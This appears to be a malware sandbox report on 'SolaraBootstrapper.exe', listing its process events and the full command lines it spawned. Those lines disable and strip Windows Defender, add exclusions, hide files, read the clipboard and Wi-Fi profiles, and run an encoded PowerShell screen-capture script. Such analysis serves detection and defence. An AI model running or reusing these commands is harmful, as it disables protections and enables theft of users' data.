N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe
PID 2316 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe
PID 1580 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1564 wrote to memory of 1976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2616 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 812 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 812 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1580 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 1580 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 1748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 1748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1592 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1592 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 4456 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 3884 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3708 wrote to memory of 2324 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe'

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6e51ab58,0x7ffd6e51ab68,0x7ffd6e51ab78

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1848 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2976 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4320 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:1

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4324 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4620 --field-trial-handle=1876,i,16429130238683387924,8042921130942079875,131072 /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAA